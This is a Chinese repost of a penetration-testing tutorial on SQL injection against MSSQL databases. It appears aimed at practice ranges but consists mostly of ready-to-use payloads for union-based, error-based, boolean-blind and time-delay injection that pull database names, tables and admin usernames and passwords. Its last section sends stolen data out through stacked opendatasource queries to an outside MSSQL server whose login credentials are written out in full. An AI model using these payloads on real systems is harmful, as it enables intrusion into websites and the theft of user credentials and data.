龙空技术网

「渗透测试」在渗透测试过程中遇到了MSSQL数据库,教你注入利用

IT野涵 153

前言:

现在朋友们对“oracle延时注入”可能比较注意,我们都需要了解一些“oracle延时注入”的相关文章。那么小编同时在网摘上搜集了一些对于“oracle延时注入””的相关内容,希望同学们能喜欢,看官们快快来了解一下吧!

前言

在渗透测试过程中遇到了MSSQL数据库,市面上也有一些文章,不过大多数讲述的都是如何快速利用注入漏洞getshell的,对于MSSQL数据库的注入漏洞没有很详细地描述。在这里我查阅了很多资料,希望在渗透测试过程中遇到了MSSQL数据库能够相对友好地进行渗透测试,文章针对实战性教学,在概念描述方面有不懂的还请自行百度,谢谢大家~

注入前准备1、确定注入点

 and 1=1
 and 1=2
2、判断是否为mssql数据库

sysobjects为mssql数据库中独有的数据表,此处页面返回正常即可表示为mssql数据库。

 and (select count(*) from sysobjects)>0

还可以通过MSSQL数据库中的延时函数进行判断,当语句执行成功,页面延时返回即表示为MSSQL数据库。

;WAITFOR DELAY '00:00:10'; -- asd
3、相关概念

系统自带库

MSSQL安装后默认带了6个数据库,其中4个系统级库:master,model,tempdb和msdb;2个示例库:Northwind Traders和pubs。

这里了解一下系统级库:

master:主要为系统控制数据库,其中包括了所有配置信息、用户登录信息和当前系统运行情况。model:模版数据库tempdb:临时容器msdb:主要为用户使用,所有的告警、任务调度等都在这个数据库中。

系统自带表

MSSQL数据库与Mysql数据库一样,有安装自带的数据表sysobjects和syscolumns等,其中需要了解的就是这两个数据表。

sysobjects:记录了数据库中所有表,常用字段为id、name和xtype。syscolumns:记录了数据库中所有表的字段,常用字段为id、name和xtype。

就如字面意思所述,id为标识,name为对应的表名和字段名,xtype为所对应的对象类型。一般我们使用两个,一个’U’为用户所创建,一个’S’为系统所创建。其他对象类型如下:

对象类型:AF = 聚合函数 (CLR)C = CHECK 约束D = DEFAULT(约束或独立)F = FOREIGN KEY 约束FN = SQL 标量函数FS = 程序集 (CLR) 标量函数FT = 程序集 (CLR) 表值函数IF = SQL 内联表值函数IT = 内部表P = SQL 存储过程PC = 程序集 (CLR) 存储过程PG = 计划指南PK = PRIMARY KEY 约束R = 规则(旧式,独立)RF = 复制筛选过程S = 系统基表SN = 同义词SQ = 服务队列TA = 程序集 (CLR) DML 触发器TF = SQL 表值函数TR = SQL DML 触发器U = 表(用户定义类型)UQ = UNIQUE 约束V = 视图X = 扩展存储过程

排序&获取下一条数据

mssql数据库中没有limit排序获取字段,但是可以使用top 1来显示数据中的第一条数据,后面与Oracle数据库注入一样,使用<>或not in 来排除已经显示的数据,获取下一条数据。但是与Oracle数据库不同的是使用not in的时候后面需要带上(‘’),类似数组,也就是不需要输入多个not in来获取数据,这可以很大程序减少输入的数据量,如下:

#使用<>获取数据 union all select top 1 null,id,name,null from dbo.syscolumns where id='5575058' and name<>'id' and name<>'username'-- qwe#使用not in获取数据 union all select top 1 null,id,name,null from dbo.syscolumns where id='5575058' and name not in ('id','username')-- qwe

堆叠注入

在SQL中,执行语句是通过;分割的,如果我们输入的;被数据库带入执行,那么就可以在其后加入sql执行语句,导致多条语句一起执行的注入,我们将其命名为堆叠注入。具体情况如下,很明显两条语句都进行了执行。

;;WAITFOR DELAY '0:0:5';-- qwe
显错注入1、判断当前字段数
 order by 4
 order by 5

通过order by报错情况,可以判断出当前字段为4。

2、联合查询,获取显错点

1、首先因为不知道具体类型,所以还是先用null来填充字符

 union all select null,null,null,null -- qwe

2、替换null为’null’,获取显错点

 union all select null,'null','null',null -- qwe

当第一个字符设置为字符串格式时,页面报错,很明显这个就是id了,为整型字符。

 union all select 'null','null','null',null -- qwe
3、通过显错点获取数据库信息

1、获取数据库版本

 union all select null,'1',(select @@version),null -- qwe

2、查询当前数据库名称

通过查询db_name()里的内容,获取所有数据库库名

 union all select null,'1',(select db_name()),null -- qwe union all select null,'1',(select db_name(1)),null -- qwe union all select null,'1',(select db_name(2)),null -- qwe union all select null,'1',(select db_name(3)),null -- qwe union all select null,'1',(select db_name(4)),null -- qwe union all select null,'1',(select db_name(5)),null -- qwe

3、查询当前用户

 union all select null,'1',(select user),null -- qwe
4、查询表名

查询dbo.sysobjects表中用户创建的表,获取其对应的id和name

 union all select null,id,name,null from dbo.sysobjects where xtype='U' -- qwe

查询下一个表名

#使用<>获取下一条数据 union all select top 1 null,id,name,null from dbo.sysobjects where xtype='U' and id <> 5575058 -- qwe#使用not in获取下一条数据 union all select top 1 null,id,name,null from dbo.sysobjects where xtype='U' and id not in ('5575058') -- qwe
5、查询列名

这里有个坑,查询列名的时候因为已经知道了表名的id值,所以where只需要使用id即可,不再需要xtype了。

 union all select top 1 null,id,name,null from dbo.syscolumns where id='5575058'-- qwe
 union all select top 1 null,id,name,null from dbo.syscolumns where id='5575058' and name not in ('id','username')-- qwe
6、information_schema

值得一提的是,除了借助sysobjects表和syscolumns表获取表名、列名外,mssql数据库中也兼容information_schema,里面存放了数据表表名和字段名,但是查询的数据好像存在一些问题,只查询到了manager表。

 union all select null,'1',(select top 1 table_name from information_schema.tables where table_name <> 'manager'),null -- qwe
 union all select null,'1',(select top 1 column_name from information_schema.columns where table_name = 'manage' ),null -- qwe union all select null,'1',(select top 1 column_name from information_schema.columns where table_name = 'manage' and column_name not in ('id','username')),null -- qwe
7、获取数据
 union all select top 1 null,username,password,null from manage-- qwe union all select top 1 null,username,password,null from manage where username <> 'admin_mz'-- qwe

解密获取密码

报错注入

mssql数据库是强类型语言数据库,当类型不一致时将会报错,配合子查询即可实现报错注入。

1、直接报错

等号两边数据类型不一致配合子查询获取数据。

#获取数据库库名?id=1' and 1=(select db_name()) -- qwe
#获取第一个表名?id=1' and 1=(select top 1 name from dbo.sysobjects) -- qwe
#将数据连接显示?id=1'  and 1=stuff((select db_name() for xml path('')),1,0,'')--+
2、convert()函数
convert(int,db_name()),将第二个参数的值转换成第一个参数的int类型。

具体用法如下:

#获取数据库库名?id=1' and 1=convert(int,(select db_name())) -- qwe
#获取数据库版本?id=1' and 1=convert(int,(select @@version))) -- qwe
3、cast()函数
CAST(expression AS data_type),将as前的参数以as后指定了数据类型转换。

具体用法如下:

#查询当前数据库?id=1' and 1=(select cast(db_name() as int)) -- qe
#查询第一个数据表?id=1' and 1=(select top 1 cast(name as int) from dbo.sysobjects) -- qe
4、数据组合输出
#将数据表组合输出?id=1' and 1=stuff((select quotename(name) from dbo.sysobjects  for xml path('')),1,0,'')--+
#查询users表中的用户名并组合输出?id=1'  and 1=stuff((select quotename(username) from users for xml path('')),1,0,'')--+
布尔盲注1、查询数据库库名

1、查询数据库库名长度为11

 and len((select top 1 db_name()))=11

2、查询第一个字符的ascii码为109

 and ascii(substring((select top 1 db_name()),1,1))=109 and ascii(substring((select top 1 db_name()),1,1))>109

3、查询第二个字符的ascii码为111

 and ascii(substring((select top 1 db_name()),2,1))=111

4、获取所有ascii码之后,解码获取数据

2、查询表名

除了像上面查询库名使用了ascii码外,还可以直接猜解字符串

 and substring((select top 1 name from dbo.sysobjects where xtype='U'),1,1)='m'
 and substring((select top 1 name from dbo.sysobjects where xtype='U'),1,6)='manage'
延时盲注1、延时函数 WAITFOR DELAY
语法:n表示延时几秒WAITFOR DELAY '0:0:n'id=1 if (布尔盲注的判断语句) WAITFOR DELAY '0:0:5' -- qwe
2、查询数据
#判断如果第一个库的库名的第一个字符的ascii码为109,则延时5秒 if (ascii(substring((select top 1 db_name()),1,1))=109) WAITFOR DELAY '0:0:5' -- qwe
#判断如果第一个表的表名的第一个字符为m,则延时5秒 if (substring((select top 1 name from dbo.sysobjects where xtype='U'),1,1)='m') WAITFOR DELAY '0:0:5' -- qwe
反弹注入

就像在Mysql中可以通过dnslog外带,Oracle可以通过python搭建一个http服务器接收外带的数据一样,在MSSQL数据库中,我们同样有方法进行数据外带,那就是通过反弹注入外带数据。

反弹注入条件相对苛刻一些,一是需要一台搭建了mssql数据库的vps服务器,二是需要开启堆叠注入。

反弹注入需要使用opendatasource函数。

OPENDATASOURCE(provider_name,init_string):使用opendatasource函数将当前数据库查询的结果发送到另一数据库服务器中。
1、环境准备

1、首先打开靶场

3、连接vps的mssql数据库,新建表test,字段数与类型要与要查询的数据相同。这里因为我想查询的是数据库库名,所以新建一个表里面只有一个字段,类型为varchar。

CREATE TABLE test(name VARCHAR(255))
2、获取数据库所有表

1、使用反弹注入将数据注入到表中,注意这里填写的是数据库对应的参数,最后通过空格隔开要查询的数据。

#查询sysobjects表?id=1';insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DC18D_test_admin;pwd=123456;database=DB_14DC18D_test').DB_14DC18D_test.dbo.test select name from dbo.sysobjects where xtype='U' -- qwe#查询information_schema数据库?id=1';insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DC18D_test_admin;pwd=123456;database=DB_14DC18D_test').DB_14DC18D_test.dbo.test select table_name from information_schema.tables -- qwe

2、执行成功页面返回正常。

3、在数据库中成功获取到数据。

3、获取数据库admin表中的所有列名

#查询information_schema数据库?id=1';insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DC18D_test_admin;pwd=123456;database=DB_14DC18D_test').DB_14DC18D_test.dbo.test select column_name from information_schema.columns where table_name='admin'-- qwe#查询syscolumns表?id=1';insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DC18D_test_admin;pwd=123456;database=DB_14DC18D_test').DB_14DC18D_test.dbo.test select name from dbo.syscolumns where id=1977058079-- qwe
4、获取数据

1、首先新建一个表,里面放三个字段,分别是id,username和passwd。

CREATE TABLE data(id INT,username VARCHAR(255),passwd VARCHAR(255))

2、获取admin表中的数据

?id=1';insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DC18D_test_admin;pwd=123456;database=DB_14DC18D_test').DB_14DC18D_test.dbo.data select id,username,passwd from  admin -- qwe
总结

完成这篇文章共费时1周,主要花时间在环境搭建以及寻找在线靶场。全文从显错注入、报错注入到盲注和反弹注入,几乎涵盖了所有MSSQL注入类型,若有所遗漏还请联系我,我必将在原文基础上进行改进。因为能力有限,本文未进行太多了原理描述,也因为SQL注入原理市面上已经有很多文章进行了讲解,所以文章最终以实战注入作为重心开展,讲述找寻到注入点后在如何在多种情况下获取数据。靶场采用墨者学院、掌控安全,以及MSSQL-sqli-labs靶场,实际攻击时还需要考虑waf绕过等,后续会计划完成一篇针对waf绕过和提权getshell的文章,敬请期待~

有需要相关学习资料的朋友可以关注私信我哦!!!

标签: #oracle延时注入 #oracle 延时注入